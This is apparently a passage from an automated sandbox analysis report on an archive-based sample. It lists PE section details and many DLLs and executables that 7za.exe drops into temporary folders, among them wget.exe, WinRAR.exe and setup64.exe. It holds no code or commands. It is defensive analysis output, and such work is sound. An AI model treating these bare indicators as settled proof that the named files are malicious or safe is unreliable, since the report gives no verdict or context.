Source: libGLESv2.dll.6.drStatic PE information: section name: .00cfg
Source: libGLESv2.dll.6.drStatic PE information: section name: .voltbl
Source: GFSDK_ShadowLib.win64.dll0.6.drStatic PE information: section name: text
Source: d3dcompiler_47.dll.6.drStatic PE information: 0x66D23DFC [Fri Aug 30 21:47:40 2024 UTC]
Source: initial sampleStatic PE information: section name: .text entropy: 6.90903234258047
Source: initial sampleStatic PE information: section name: .text entropy: 6.95576372950548
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\javacpl.cpl
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\ImageMetaData.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jp2iexp.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mfc100cht.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jawt.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\dt_socket.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\boost_system.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\FModSound.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mfc100chs.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\wsdetect.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jpeg.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\GPUPerfAPIDX11-x64.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\d3dcompiler_47.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\sunmscapi.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\d3dcompiler_47.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_enc_mp2sr.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\decora_sse.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\nio.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\lcms.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\InterfaceCreation.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\java_crw_demo.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\boost_system.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_config_mp2m.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_config_pcm.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DX8_SoundFile2.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\zip.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\MXF_SDK_Modules_DataIO_1.4.22_vs10.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\PlugPlugExternalObject.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_config_mp2v.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_config_mpa.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\Tesselator.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_config_mp4v.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\instrument.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jsoundds.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_config_mp2v.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\net.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\InterfaceFunction.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\MXF_SDK_Modules_DataIO_1.4.22_vs10.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\bci.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\adbeape.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\prism_d3d.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\DirectX\7z.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\GFSDK_ShadowLib.win64.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX\setup64.exeJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DL100PDFL.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DL100PDFL.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\SceneContainerCommand.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_enc_mp2sr.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\t2k.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\DirectX\7z.exe
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\sunec.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\dcpr.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\InterfaceCreation.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_config_mp4v.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\MXF_SDK_GenericContainer_AVI_4.5.16_vs10.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\CGRCommand.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\DirectX\WinRAR.exe
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\splashscreen.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\boost_system.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DL100AGM.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\GroupBuffer.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\InterfaceCommand.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\InstanceContainer.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DL100AGM.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\FloatTexture.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_trans_audio_converter.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jfxwebkit.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\boost_system.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mfc100chs.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\FileLoader.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\StyleTransfer.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_demux_dv.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\DirectX\setup64.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\adbeape.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DX8_UserInput.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\JSONCommand.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\prism_sw.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jli.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\DX8_SysInfo.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\XMLDOMCommand.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\mlib_image.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\DX8_MotionSet.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jfr.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\DX8_TextOut.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DX8_DirectInput.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\prism_common.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\PRM.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\MXF_SDK_GenericContainer_SystemScheme1_4.5.16_vs10.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\ESM_SaveTextFile.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\InterfaceChannel.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_config_mpa.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\GPUPerfAPIDX11-x64.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_enc_pcm.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\fxplugins.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\Internet.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\libGLESv2.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\CopyImage.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_mux_dv.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\PRM.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\msvcp120.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_trans_audio_converter.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\WindowsAccessBridge.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\MXF_SDK_GenericContainer_AVI_4.5.16_vs10.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jp2native.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_dec_spic.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\ImageStitcher.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_config_mp4v.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX\7z.exeJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mfc100cht.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\DirectX\wget.exe
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DX8_MatrixInterpolateSet.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_trans_audio_converter.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\deploy.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\j2pcsc.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_dec_spic.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\JAWTAccessBridge.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\glass.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\fontmanager.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_config_mp2v.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_config_mp2m.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\SAXParser.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jsound.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\j2pkcs11.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_demux_dv.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\ssv.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\MXF_SDK_GenericContainer_AES3_4.5.16_vs10.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\msvcr120.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\PlugPlugExternalObject.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jsdt.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX\WinRAR.exeJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\resource.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\Win32_Font.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\DL100AGM.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jdwp.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\FileDialog.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\MXF_SDK_GenericContainer_SystemScheme1_4.5.16_vs10.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_config_pcm.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\InstanceRefHash.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\GFSDK_ShadowLib.win64.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jfxmedia.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_config_mpa.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\javafx_iio.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\MXF_SDK_GenericContainer_AVI_4.5.16_vs10.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_trans_video_framerate.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\msvcr100.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\kcms.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\JAWTAccessBridge-32.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\MXF_SDK_GenericContainer_AES3_4.5.16_vs10.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX\setup64.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_dec_spic.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\adbeape.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mfc100chs.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_mux_dv.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jaas_nt.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_enc_pcm.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\JavaAccessBridge-32.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\MXF_SDK_Modules_DataIO_1.4.22_vs10.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\Surface.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\javacpl.cpl
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\XMLDOMObject.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_config_pcm.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DX8_ImportObject.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mfc100cht.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\InterfaceCommand.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\InterfaceUnique.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\Image.Services.Core.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\VectorOperator.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\unpack.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\d3dcompiler_47.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\awt.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_config_mp2m.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\MXF_SDK_GenericContainer_AES3_4.5.16_vs10.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\eula.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\javafx_font_t2k.dll
